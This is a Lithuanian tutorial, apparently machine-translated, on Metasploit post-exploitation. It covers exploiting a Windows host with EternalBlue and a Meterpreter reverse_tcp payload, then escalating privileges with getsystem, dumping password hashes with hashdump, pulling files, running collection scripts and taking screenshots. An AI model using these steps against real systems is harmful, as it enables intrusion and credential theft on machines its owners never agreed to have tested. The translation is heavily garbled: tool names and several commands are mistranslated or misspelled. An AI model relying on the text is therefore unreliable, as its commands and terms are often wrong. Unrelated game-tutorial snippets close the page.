metasploit

Išnaudojimas po „Meterpreter“

Išnaudojimas po „Meterpreter“
Tai yra „Metasploit“ naudingosios apkrovos įskiepio įvadas. Šioje trumpoje pamokoje aptarsime, kaip ją naudoti taikant po išnaudojimą WINDOWS OS sistemai, kai jau ją pažeidėte naudodami „Eternalblue“ išnaudojimą. Apsiribosime prieiga prie „Windows“ sistemos ir jos tyrinėjimo, o visi dalykai, kuriuos ketiname daryti, bus sutelkti į informacijos ir vartotojo prisijungimo duomenų prieigą.

Įvadas į skaitiklį

Matuoklis yra atakos naudingoji apkrova „Metasploit“ sistemoje, leidžianti kaltininkui valdyti aukos kompiuterį ir naršyti jį per komandos apvalkalą. Tai gali pasirodyti esanti labai universali priemonė, kai reikia įsiskverbimo bandymų.  Tai yra po eksploatavimo įrankis, pagrįstas atminties DLL įpurškimu, tai reiškia, kad jis paleidžia įvestą DLL, sukurdamas naują procesą, reikalaujantį sistemai paleisti švirkščiamą DLL. Tai gali suteikti jums prieigą prie nematomos komandos aukos aukos mašinoje, leidžiančios paleisti vykdomuosius ir profilių tinklus.

Iš pradžių jis buvo parašytas „Metasploit 2“.x ir yra patobulintas „Metasploit 3“.

Mes išsamiai aptarsime „Meterpreter“ naudojimą, tačiau prieš tai pakalbėkime apie naudingąsias apkrovas apskritai

Kas yra naudingosios apkrovos?

„Metasploit“ naudingosios apkrovos yra moduliai, tai reiškia, kad jie yra „Metasploit“ kodų fragmentai, kurie veikia nuotolinėje sistemoje, į kurią mes nukreipiame. Pirmiausia siunčiamas išnaudojimo modulis, kuris įdiegia naudingosios apkrovos modulį sistemoje. Tada naudingoji apkrova suteikia prieigą užpuolikui (ribota arba visavertė, priklauso nuo naudingosios apkrovos turinio). Norėdami išsamiau apibūdinti naudingųjų apkrovų veikimą, turime aptarti jo tipus, kurie iš viso yra 3:

Vienišiai

Šios naudingos apkrovos yra visiškai savarankiškos, o tai reiškia, kad jos gali būti tokios pat paprastos, kaip vartų prižiūrėtojų kodai, leidžiantys vartotojui patekti į tikslinę sistemą.

Stagers

Pirmininkai yra naudingieji kroviniai, kurie renka programas tikslinėje sistemoje ir siunčia ją užpuolikui. Tai nustato ryšį tarp aukos ir mūsų vietinės mašinos.

Etapai

Kai pakopos vartotojai turi prieigą prie sistemos, jie atsisiunčia etapų modulius. Etapų moduliai nuima matuoklio dydžio dangtelį.

Etapų pavyzdžiai būtų paprastas apvalkalas, „iPhone“ apvalkalas, „Meterpreter“ moduliai, „VNC Injection“.

Galite išsiaiškinti naudingosios apkrovos tipą, suprasdami jo pavadinimą. Vienkartiniai kroviniai paprastai yra tokio formato /

Išnaudojimas su „Meterpreter“

Pirmiausia paleiskite msf konsolę, Kalio terminalo lange įvesdami šią terminalo komandą.

$ sudo msfconsole

Mes naudojame reverse_tcp kaip pakopą, o Meterpreter - kaip sceną.

Pradėsime nuo amžinojo mėlyno išnaudojimo. Pasirinkite [ms17_010_eternalblue], tada nustatykite „Windows / x64 / meterpreter / reverse_tcp“ kaip pasirinktą naudingąją apkrovą

Tada sukonfigūruokite išnaudojimo parametrus, tada paleiskite eksploatuoti naudodami komandą:

$ set naudingosios apkrovos langai / x64 / meterpreter / reverse_tcp
$ set rhost 192.168.198.136
$ išnaudoti

The „Eternalblue“ išnaudojimas sėkmingai suaktyvintas.

Po išnaudojimo

Po eksploatavimo mes prieiname ir manipuliuojame jau pažeista sistema.

Dabar, kai turime prieigą prie sistemos, galime padaryti daugybę dalykų, tačiau, kaip minėta pirmiau, daugiausia dėmesio čia turime skirti informacijos atsisiuntimui ir vartotojo kredencialų gavimui

Prieigos privilegijos valdymas:

Priklausomai nuo naudingos apkrovos modulio ir naudojamo išnaudojimo, jums gali būti taikomi tam tikri prieigos apribojimai, kurie labai sugadins jūsų sugebėjimus manevruoti aukos mašiną. Šią problemą galite apeiti išplėsdami privilegijas ištrindami slaptažodžius ir sugadindami registrus. Taip pat galite išplėsti privilegijas naudodami komandą „Meterpreter's get system“.

$ getsystem
$ getuid

Failų perdavimas naudojant „Meterpreter“

Naudodami „Meterpreter“ galite atsisiųsti failą naudodami komandą $ download-.

$ download / windows / system32 / drivers / etc / hosts

Panašiai galite įkelti informaciją ir į kompiuterį naudodami komandą $ upload-

Vartotojo prisijungimo duomenų išskyrimas:

Naudokite kodo scenarijų credential_collector, kad išgautumėte vartotojų abonementų informaciją, arba naudokite panašų efektą maišos iškelties pašto modulį.

Kurdami kredencialus, naudosime maišos išklotinės posto modulį. Įveskite šią komandą msf.

$ run post / windows / collect / hashdump

Kaip matome, mes turime „Coen“, „guest“ ir „admin“ paskyras. LM maišos (administratoriaus) ir NTLM (svečio) maišos yra susijusios su tuščiais slaptažodžiais, o „Coen“ maišos yra slaptažodis, kurį turėsite nulaužti. Tai galite padaryti naudodami slaptažodžių nulaužimo priemonę.

Sistemos grandymo automatizavimas

Gali būti nuobodu rinkti informaciją su atskirais įvesties teiginiais, kad jūs turite toliau maitinti komandos apvalkalą. Patogiai galite šiek tiek automatizuoti šį procesą naudodami „vineum-script“. Scenarijus renka informaciją iš aukos ir atsisiunčia duomenis į mūsų vietinę mašiną. Jums bus pasakyta, kur išsaugoma išvestis, kaip matote ketvirtoje eilutėje iš viršaus:

$ paleisti wineum

Turėkite omenyje, kad kelias, kuriame saugoma kiekvienos komandos išvestis, gali skirtis nuo čia rodomo kelio.

Leidžia dar šiek tiek susipainioti

Vykdomi failai

Bet kurį failą sistemoje galite paleisti naudodami: execute -f . Tai apima ir vykdomuosius failus, ir programas su keliais palaikomaisiais failais. Pvz., Norėdami paleisti integruotą skaičiuoklės programą „Windows OS“, įveskite execute -f calc.exe

Padaryti ekrano kopijas

Taip pat galite užfiksuoti ekrano kopijas vartotojo požiūriu. Tiesiog įveskite ekrano kopiją „Meterpreter“ komandos apvalkale ir gausite sistemos ekrano ekrano kopiją.

$ vykdyti -f apskaičiuoti.exe
$ ekrano kopija

Išvada:

Tai buvo trumpas „Metasploit“ įskiepio „Metasploit“ įvadas ir trumpas vadovas, kuriame pristatomi pagrindiniai jo naudojimo būdai. Mes čia sužinojome, kaip galime pažeisti „Windows“ sistemą su „Eternalblue“ išnaudojimu, kad gautume prieigą, tada naudokite „Meterpreter“, kad padidintumėte teises, rinktumėte informaciją rankiniu būdu ir automatizuodami „vineus-“ komandą. Mes taip pat sužinojome, kaip vykdyti failus aukos mašinoje.

Matuoklis gali būti vertinama pažeidžiamumo nustatymo priemonė, nepaisant to, kad jis yra „Metasploit“ sistemos pagrindinių įrankių susivienijimas.

„OpenTTD“ pamoka
„OpenTTD“ yra vienas iš populiariausių verslo modeliavimo žaidimų. Šiame žaidime turite sukurti nuostabų transporto verslą. Tačiau pradėsite nuo mažda...
„SuperTuxKart“, skirta „Linux“
„SuperTuxKart“ yra puikus pavadinimas, sukurtas nemokamai suteikti „Mario Kart“ patirtį jūsų „Linux“ sistemoje. Tai gana sudėtinga ir smagu žaisti, yr...
„Battle for Wesnoth“ pamoka
„Battle for Wesnoth“ yra vienas populiariausių atvirojo kodo strateginių žaidimų, kurį šiuo metu galite žaisti. Šis žaidimas ne tik buvo kuriamas laba...